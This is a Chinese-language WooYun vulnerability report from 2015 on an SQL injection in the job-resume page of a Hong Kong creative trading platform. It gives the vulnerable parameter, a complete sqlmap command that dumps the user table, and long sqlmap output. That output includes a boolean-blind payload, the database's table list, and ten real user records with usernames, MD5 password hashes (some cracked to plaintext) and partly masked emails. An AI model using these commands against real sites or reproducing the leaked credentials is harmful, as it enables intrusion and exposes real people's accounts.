当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157731

漏洞标题:香港創意交易平台主站存在SQL注射漏洞(1W多名用户密码与邮箱)(香港地區)

相关厂商:香港創意交易平台

漏洞作者: 路人甲

提交时间:2015-12-03 11:35

修复时间:2015-12-08 11:36

公开时间:2015-12-08 11:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-03: 细节已通知厂商并且等待厂商处理中
2015-12-08: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

香港創意交易平台主站存在SQL注射漏洞(1W多名用户密码与邮箱)

详细说明:

地址:http://**.**.**.**/modules/jobs/index2.php?pa=viewResume&rid=00000000883

$ python sqlmap.py -u "http://**.**.**.**/modules/jobs/index2.php?pa=viewResume&rid=00000000883" -p rid --technique=B --random-agent --batch  --no-cast -Danyidea_anyidea01 -T xoops_users -C uname,pass,name,email --dump --start 1 --stop 10


back-end DBMS: MySQL 5
Database: anyidea_anyidea01
+-------------+---------+
| Table       | Entries |
+-------------+---------+
| xoops_users | 10364   |
+-------------+---------+


Database: anyidea_anyidea01
Table: xoops_users
[10 entries]
+-------------+-------------------------------------------+------+---------------------------+
| uname       | pass                                      | name | email                     |
+-------------+-------------------------------------------+------+---------------------------+
| yan_mcmug   | 1610d99bbd13b300487c992cf35fa29c          |      | keit10k@**.**.**.**       |
| nurikodomto | bb12b3dcc45be59fc8bde152a5e2d319          |      | trobyjustice@**.**.**.** |
| leungkar    | 1eaaaeebba29787989af2819ca811bbc          |      | handsomejoeyam@**.**.**.**  |
| Vencent     | bcbda11e419cca4dca93e0232bcf1ef1          |      | tri_s@**.**.**.**         |
| fly_design  | c27b91c76443289c5754054bb0aad1cf          |      | greybird406@**.**.**.**   |
| greatmoment | b427ebd39c845eb5417b7f7aaf1f9724 (zxcvbn) |      | hksy151@**.**.**.**       |
| otto        | a152e841783914146e4bcd4f39100686 (asdfgh) |      | shan5432@**.**.**.**     |
| wilsonho    | 990a1aeb1f5630064e5308716c308583 (102901) |      | yumeinana@**.**.**.**    |
| gallium     | 2235c41b8801fd450bc252961b4d40c0          |      | joey_lo_88@**.**.**.**    |
| S.Y         | 439cbba42741be50eff62c68880e86af          |      | kevinleelck@**.**.**.**   |
+-------------+-------------------------------------------+------+---------------------------+

漏洞证明:

current user:    'anyidea_anyidea@localhost'
current user is DBA:    False
database management system users [1]:
[*] 'anyidea_anyidea'@'localhost'
Database: anyidea_anyidea01
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| xoops_users_attributes                | 39938   |
| xoops_anyidea_event                   | 32202   |
| xoops_jobs_resume                     | 17223   |
| xoops_users                           | 10364   |
| cdb_memberfields                      | 10352   |
| cdb_members                           | 10352   |
| xoops_groups_users_link               | 10343   |
| xoops_users_20130711                  | 8074    |
| cdb_posts                             | 6030    |
| xoops_xoopscomments                   | 4893    |
| cdb_attachments                       | 4573    |
| cdb_mythreads                         | 4217    |
| cdb_threads                           | 4037    |
| xoops_jobs_transaction                | 3783    |
| check_code                            | 3298    |
| xoops_jobs_jobfaq                     | 3115    |
| xoops_jobs_vote                       | 1991    |
| cdb_onlinetime                        | 1666    |
| xoops_group_permission                | 1567    |
| cdb_myposts                           | 1466    |
| xoops_users_auth                      | 1425    |
| xoops_catads_ads                      | 1133    |
| xoops_priv_msgs                       | 974     |
| xoops_jobs_listing                    | 941     |
| xoops_session                         | 512     |
| xoops_avatar                          | 495     |
| xoops_avatar_user_link                | 495     |
| xoops_users_backup                    | 465     |
| cdb_rsscaches                         | 293     |
| xoops_xfguestbook_country             | 240     |
| xoops_catads_departements             | 237     |
| xoops_config                          | 233     |
| xoops_jobs_rss                        | 224     |
| xoops_configoption                    | 207     |
| xoops_stories                         | 193     |
| cdb_settings                          | 187     |
| cdb_statvars                          | 169     |
| xoops_tplfile                         | 147     |
| cdb_searchindex                       | 140     |
| xoops_lt_config                       | 139     |
| xoops_tplsource                       | 136     |
| supe_effects                          | 125     |
| supe_cache                            | 114     |
| cdb_threadsmod                        | 104     |
| cms_join_event                        | 96      |
| xoops_lt_users_permissions            | 93      |
| xoops_lt_referers                     | 86      |
| xoops_catads_cat                      | 85      |
| cdb_subscriptions                     | 79      |
| xoops_lt_bayesian_tokens              | 72      |
| supe_categories                       | 69      |
| xoops_lt_permissions                  | 66      |
| xoops_block_module_link               | 61      |
| supe_settings                         | 59      |
| xoops_newblocks                       | 57      |
| cdb_polloptions                       | 53      |
| cdb_stats                             | 50      |
| xoops_catads_feedback                 | 48      |
| cdb_blogcaches                        | 44      |
| cdb_favorites                         | 40      |
| xoops_xoopsnotifications              | 38      |
| cdb_pms                               | 37      |
| supe_prefields                        | 37      |
| xoops_users_industry                  | 36      |
| cdb_stylevars                         | 34      |
| xoops_jobs_categories                 | 32      |
| cdb_smilies                           | 29      |
| xoops_lt_article_categories_link      | 28      |
| xoops_lt_articles                     | 28      |
| xoops_lt_articles_text                | 28      |
| xoops_counter                         | 24      |
| cdb_forumfields                       | 23      |
| cdb_forums                            | 23      |
| cdb_moderators                        | 23      |
| xoops_catads_regions                  | 23      |
| supe_styles                           | 20      |
| xoops_content                         | 20      |
| xoops_smiles                          | 17      |
| cdb_usergroups                        | 15      |
| xoops_catads_options                  | 14      |
| xoops_smartfaq_answers                | 14      |
| cdb_polls                             | 13      |
| xoops_smartfaq_faq                    | 12      |
| cdb_crons                             | 11      |
| xoops_lt_articles_categories          | 11      |
| cdb_medals                            | 10      |
| cdb_sessions                          | 10      |
| cms_event_talk                        | 10      |
| supe_crons                            | 10      |
| xoops_modules                         | 10      |
| cms_event                             | 9       |
| supe_usergroups                       | 9       |
| cdb_bbcodes                           | 7       |
| cdb_buddys                            | 7       |
| xoops_configcategory                  | 7       |
| xoops_ranks                           | 7       |
| xoops_stats_userscreen                | 7       |
| cdb_ratelog                           | 6       |
| supe_attachmenttypes                  | 6       |
| xoops_banner                          | 6       |
| xoops_bb_reads_forum                  | 6       |
| xoops_groups                          | 6       |
| xoops_lt_bayesian_filter_info         | 6       |
| xoops_lt_blogs                        | 6       |
| xoops_xfguestbook_config              | 6       |
| cdb_ranks                             | 5       |
| xoops_bb_forums                       | 5       |
| xoops_jobs_status                     | 5       |
| xoops_lt_articles_comments            | 5       |
| xoops_smartfaq_categories             | 5       |
| xoops_stats_usercolor                 | 5       |
| cdb_onlinelist                        | 4       |
| xoops_jobs_ttype                      | 4       |
| xoops_users_class                     | 4       |
| cdb_admingroups                       | 3       |
| xoops_bannerclient                    | 3       |
| cdb_adminsessions                     | 2       |
| cdb_failedlogins                      | 2       |
| cdb_words                             | 2       |
| xoops_bb_categories                   | 2       |
| xoops_bb_online                       | 2       |
| xoops_bb_reads_topic                  | 2       |
| xoops_ctem_pagelink                   | 2       |
| xoops_jobs_price                      | 2       |
| xoops_jobs_type                       | 2       |
| xoops_lt_users                        | 2       |
| xoops_online                          | 2       |
| xoops_topics                          | 2       |
| cdb_profilefields                     | 1       |
| cdb_styles                            | 1       |
| cdb_templates                         | 1       |
| cdb_threadtypes                       | 1       |
| cms_sys                               | 1       |
| cms_user                              | 1       |
| supe_robots                           | 1       |
| xoops_bannerfinish                    | 1       |
| xoops_bb_posts                        | 1       |
| xoops_bb_posts_text                   | 1       |
| xoops_bb_topics                       | 1       |
| xoops_imagecategory                   | 1       |
| xoops_imgset                          | 1       |
| xoops_imgset_tplset_link              | 1       |
| xoops_jobs_res_categories             | 1       |
| xoops_stories_votedata                | 1       |
| xoops_tplset                          | 1       |
| xoops_xfguestbook_msg                 | 1       |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 2490    |
| STATISTICS                            | 651     |
| GLOBAL_STATUS                         | 291     |
| SESSION_STATUS                        | 291     |
| GLOBAL_VARIABLES                      | 277     |
| SESSION_VARIABLES                     | 277     |
| PARTITIONS                            | 275     |
| TABLES                                | 275     |
| KEY_COLUMN_USAGE                      | 250     |
| TABLE_CONSTRAINTS                     | 232     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 130     |
| COLLATIONS                            | 129     |
| CHARACTER_SETS                        | 36      |
| SCHEMA_PRIVILEGES                     | 18      |
| PLUGINS                               | 7       |
| ENGINES                               | 5       |
| SCHEMATA                              | 3       |
| PROCESSLIST                           | 1       |
| USER_PRIVILEGES                       | 1       |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: anyidea_anyidea01
Table: xoops_users_20130711
[1 column]
+--------+
| Column |
+--------+
| pass   |
+--------+
Database: anyidea_anyidea01
Table: supe_members
[1 column]
+----------+
| Column   |
+----------+
| password |
+----------+
Database: anyidea_anyidea01
Table: cms_sys
[1 column]
+----------+
| Column   |
+----------+
| password |
+----------+
Database: anyidea_anyidea01
Table: xoops_users
[1 column]
+--------+
| Column |
+--------+
| pass   |
+--------+
Database: anyidea_anyidea01
Table: cdb_members
[1 column]
+----------+
| Column   |
+----------+
| password |
+----------+
Databsqlmap resumed the following injection point(s) from stored session:
---
Parameter: rid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pa=viewResume&rid=00000000883 AND 5794=5794
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5
Database: anyidea_anyidea01
+-------------+---------+
| Table       | Entries |
+-------------+---------+
| xoops_users | 10364   |
+-------------+---------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: rid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pa=viewResume&rid=00000000883 AND 5794=5794
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5
Database: anyidea_anyidea01
Table: xoops_users
[37 columns]
+-----------------+-----------------------+
| Column          | Type                  |
+-----------------+-----------------------+
| level           | tinyint(3) unsigned   |
| actkey          | varchar(8)            |
| attachsig       | tinyint(1) unsigned   |
| bio             | tinytext              |
| class           | tinyint(3) unsigned   |
| contact         | varchar(100)          |
| email           | varchar(60)           |
| industry        | tinyint(4)            |
| last_login      | int(10) unsigned      |
| name            | varchar(60)           |
| notify_method   | tinyint(1)            |
| notify_mode     | tinyint(1)            |
| pass            | varchar(32)           |
| points_con      | int(10) unsigned      |
| points_pro      | int(10) unsigned      |
| posts           | mediumint(8) unsigned |
| rank            | smallint(5) unsigned  |
| tel             | varchar(50)           |
| theme           | varchar(100)          |
| timezone_offset | float(3,1)            |
| uid             | mediumint(8) unsigned |
| umode           | varchar(10)           |
| uname           | varchar(25)           |
| uorder          | tinyint(1) unsigned   |
| url             | varchar(100)          |
| user_aim        | varchar(18)           |
| user_avatar     | varchar(30)           |
| user_from       | varchar(100)          |
| user_icq        | varchar(15)           |
| user_intrest    | varchar(150)          |
| user_mailok     | tinyint(1) unsigned   |
| user_msnm       | varchar(100)          |
| user_occ        | varchar(100)          |
| user_regdate    | int(10) unsigned      |
| user_sig        | tinytext              |
| user_viewemail  | tinyint(1) unsigned   |
| user_yim        | varchar(25)           |
+-----------------+-----------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: rid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pa=viewResume&rid=00000000883 AND 5794=5794
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5
Database: anyidea_anyidea01
Table: xoops_users
[10 entries]
+-------------+-------------------------------------------+------+---------------------------+
| uname       | pass                                      | name | email                     |
+-------------+-------------------------------------------+------+---------------------------+
| yan_mcmug   | 1610d99bbd13b300487c992cf35fa29c          |      | keit10k@**.**.**.**       |
| nurikodomto | bb12b3dcc45be59fc8bde152a5e2d319          |      | trobyjustice@**.**.**.** |
| leungkar    | 1eaaaeebba29787989af2819ca811bbc          |      | handsomejoeyam@**.**.**.**  |
| Vencent     | bcbda11e419cca4dca93e0232bcf1ef1          |      | tri_s@**.**.**.**         |
| fly_design  | c27b91c76443289c5754054bb0aad1cf          |      | greybird406@**.**.**.**   |
| greatmoment | b427ebd39c845eb5417b7f7aaf1f9724 (zxcvbn) |      | hksy151@**.**.**.**       |
| otto        | a152e841783914146e4bcd4f39100686 (asdfgh) |      | shan5432@**.**.**.**     |
| wilsonho    | 990a1aeb1f5630064e5308716c308583 (102901) |      | yumeinana@**.**.**.**    |
| gallium     | 2235c41b8801fd450bc252961b4d40c0          |      | joey_lo_88@**.**.**.**    |
| S.Y         | 439cbba42741be50eff62c68880e86af          |      | kevinleelck@**.**.**.**   |
+-------------+-------------------------------------------+------+---------------------------+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-12-08 11:36

厂商回复:

最新状态:

暂无